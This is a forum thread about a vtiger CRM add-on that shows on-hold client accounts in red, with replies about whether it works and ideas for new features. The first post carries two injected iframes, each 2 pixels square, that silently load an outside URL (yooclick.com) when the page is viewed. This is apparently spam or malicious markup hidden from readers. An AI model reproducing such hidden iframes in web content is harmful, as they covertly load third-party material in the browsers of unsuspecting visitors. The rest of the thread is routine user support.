flag spcific accounts

I would like to flag specific accounts as on hold or blocked. ie. a clients account is overdue. I would then like to mark the account/client as on hold, then whenever you saw the account name it would appear in red, so the user knows it is on hold.

if anybody is interested in building this please advice on cost? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • joe from tsolucio.com wrote the following code for me, see attached zip file, works great. it adds a new checkbox field to accounts. when ticked the account name, displays in red, or whatever colour you choose in all other modules/lists.

    we use it to let the support guys know which accounts are on hold due to non payment or something and then they know not to provide any further support, you could use if for many other purposes.

    i hope some other people get good use form it, if you need any support re the modification speak to joe from tsolucio. i can recommend him for any vtiger development work.

    to the vtiger team i hope this code will make it into the base product.

  • hi, this did not work on my system (v5.10- dutch), i see the entry in the account but putting it on yes (or no) did not affect the coloring of the accountname.

  • i would love to see this addon become part of the core of vtiger. very simple addition but very useful.

    also would be amazing if when creating lists you could choose to have certain items a different colour according to certain criteria. i.e. if the due date in the list is past current date change the color to orange or something.

    should i add this somewhere as a feature request?
  • hi stevens,

    could you tell me wich them you are using for this to work, or does it work on all themes?
